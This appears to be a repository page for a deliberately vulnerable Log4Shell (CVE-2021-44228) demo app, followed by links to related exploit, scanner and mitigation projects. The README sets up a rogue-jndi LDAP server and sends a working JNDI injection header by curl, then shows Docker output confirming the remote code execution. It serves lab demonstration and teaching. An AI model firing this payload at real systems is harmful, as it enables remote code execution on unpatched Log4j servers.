Log4Shell sample vulnerable application (CVE-2021-44228)

Related tags

Security CVE-2021-44228-poc
Overview

Log4Shell sample vulnerable application (CVE-2021-44228)

This is an almost copy/similar vulnerable application to https://github.com/christophetd/log4shell-vulnerable-app

The main differences are maven instead of gradle, and the usage of rogue-jndi.

This repository contains a maven Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell.

It uses Log4j 2.6.1 and JDK version 1.8.0_181.

Running the springboot application

Build and run the docker springboot application:

docker build . -t vulnerable-app
docker run -p 8080:8080 vulnerable-app

Exploitation

  1. git clone https://github.com/veracode-research/rogue-jndi
  2. cd rogue-jndi
  3. mvn package
  4. java -jar target/RogueJndi-1.1.jar --command "touch /tmp/test_if_rce" --hostname "192.168.1.x"

Open a second terminal

  1. curl localhost:8080 -H 'X-Api-Version: ${jndi:ldap://192.168.1.x:1389/o=reference}'

Where in both cases 192.168.1.x is your IP

NOTE: don't use localhost, use your actual private IP address.

Now check if RCE was succesful:

8080/tcp, :::8080->8080/tcp gallant_easley"> 
$ docker ps                                 
CONTAINER ID   IMAGE            COMMAND                  CREATED         STATUS         PORTS                                       NAMES
04536dbd1dff   vulnerable-app   "java -jar demo-0.0.…"   2 minutes ago   Up 2 minutes   0.0.0.0:8080->8080/tcp, :::8080->8080/tcp   gallant_easley
$ docker container exec -it 04536dbd1dff ash
/opt/app # ls /tmp
hsperfdata_root                          tomcat-docbase.8080.4585569232401237075
test_if_rce                              tomcat.8080.1707298461175346507

As you can see, the file test_if_rce exists. Which means RCE was succesful.

NOTE

Code and ideas have been used from the following repositories:

You might also like...

Huntress Log4Shell Testing Application

Huntress Log4Shell Testing Application This repo holds the source for the HTTP and LDAP servers hosted here. Both services are hosted under one Java a

Nov 25, 2022

Writeup and exploit for installed app to system privilege escalation on Android 12 Beta through CVE-2021-0928

Writeup and exploit for installed app to system privilege escalation on Android 12 Beta through CVE-2021-0928

Writeup and exploit for installed app to system privilege escalation on Android 12 Beta through CVE-2021-0928, a `writeToParcel`/`createFromParcel` serialization mismatch in `OutputConfiguration`

Dec 30, 2022

Log4Shell RCE exploit using a gadget class. Not dependent on an old JDK version to work.

Log4Shell RCE exploit using a gadget class. Not dependent on an old JDK version to work.

Jan 4, 2022

Disables JNDI lookup globally using Java agent instrumentation, mitigation for Log4Shell attacks.

NoJNDI This is a simple proof of concept agent that disables JNDI lookups globally across the JVM. This is useful for mitigating the Log4Shell attack,

Dec 29, 2021

Log4Shell Zero-Day Exploit Proof of Concept

Log4Shell Zero-Day Exploit Proof of Concept

Log4Shell Zero-Day Exploit if attacker manage to log this string ${jndi:ldap://someaddresshere/param1=value1} to log4j it somehow loads the class/java

Oct 9, 2022

Contains all my research and content produced regarding the log4shell vulnerability

Contains all my research and content produced regarding the log4shell vulnerability

Objective Contains all my research and content produced regarding the log4shell vulnerability. Content Folder "analysis" Contain the information that

Oct 28, 2022

Hdiv CE | Application Self-Protection

Hdiv CE | Application Self-Protection

New to Hdiv? Check this out Hdiv: Application Self-Protection Hdiv is a leading provider of open source software for real-time, self-protected applica

Nov 14, 2022

OACC (Object ACcess Control) is an advanced Java Application Security Framework

OACC Java Application Security Framework What is OACC? OACC - pronounced [oak] - is a fully featured API to both enforce and manage your application's

Nov 24, 2022

This application can recognize the sign language alphabets and help people who do not understand sign language to communicate with the speech and hearing impaired.

This application can recognize the sign language alphabets and help people who do not understand sign language to communicate with the speech and hearing impaired.

Sign Language Recognition App This application can recognize the sign language alphabets and help people who do not understand sign language to commun

Oct 7, 2021
Owner
StandB
programming & security
StandB
GitHub
A mitigation for CVE-2021-44228 (log4shell) that works by patching the vulnerability at runtime. (Works with any vulnerable java software, tested with java 6 and newer)

Log4jPatcher A Java Agent based mitigation for Log4j2 JNDI exploits. This agent employs 2 patches: Disabling all Lookup conversions (on supported Log4

null 45 Dec 16, 2022
Burp Active Scan extension to identify Log4j vulnerabilities CVE-2021-44228 and CVE-2021-45046

Log4j-HammerTime This Burp Suite Active Scanner extension validates exploitation of the Apache Log4j CVE-2021-44228 and CVE-2021-45046 vulnerabilities

DXC Technology - StrikeForce 8 Jan 8, 2022
CVE-2021-44228 (Log4Shell) Proof of Concept

CVE-2021-44228 (Log4Shell) Proof of Concept Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect ag

Sunnyvale S.r.l. 5 Mar 18, 2022
An LDAP RCE exploit for CVE-2021-44228 Log4Shell

log4j-poc An LDAP RCE exploit for CVE-2021-44228 Log4Shell Description The demo Tomcat 8 server on port 8080 has a vulnerable app (log4shell) deployed

null 60 Dec 10, 2022
PCRE RegEx matching Log4Shell CVE-2021-44228 IOC in your logs

Log4Shell-Rex The following RegEx was written in an attempt to match indicators of a Log4Shell (CVE-2021-44228 and CVE-2021-45046) exploitation. If yo

back2root 286 Nov 9, 2022
A Basic Java Application Vulnerable to the Log4Shell RCE

This is a basic, minimal, intentionally vulnerable Java web application including a version (2.14.1) of the log4j library affected by the infamous log4shell (CVE-2021-44228) vulnerability.

null 31 Nov 9, 2022
CVE-2021-44228 (Apache Log4j Remote Code Execution)

CVE-2021-44228 (Apache Log4j Remote Code Execution) all log4j-core versions >=2.0-beta9 and <=2.14.1 The version of 1.x has other vulnerabilities, it

Roxas77 10 Apr 23, 2022
log4j2-scan is a single binary command-line tool for CVE-2021-44228 vulnerability scanning and mitigation patch

log4j2-scan is a single binary command-line tool for CVE-2021-44228 vulnerability scanning and mitigation patch. It also supports nested JAR file scan

Logpresso GitHub 839 Dec 29, 2022
Local Bytecode Scanner for the Log4JShell Vulnerability (CVE-2021-44228)

?? Log4JShell Bytecode Detector Log4jShell Bytecode Detector is an open source tool that helps identify if a jar file is affected by the critical CVE-

CodeShield GmbH 49 Apr 23, 2022
Log4shell-hunter - Scanner that scans local files for log4shell vulnerability

Log4shell-hunter - Scanner that scans local files for log4shell vulnerability. Does bytecode analysis so it does not rely on metadata. Will find vulnerable log4j even it has been self-compiled/repackaged/shaded/nested (e.g. uberjar, fatjar) and even obfuscated.

Peter Fichtner 5 Feb 27, 2022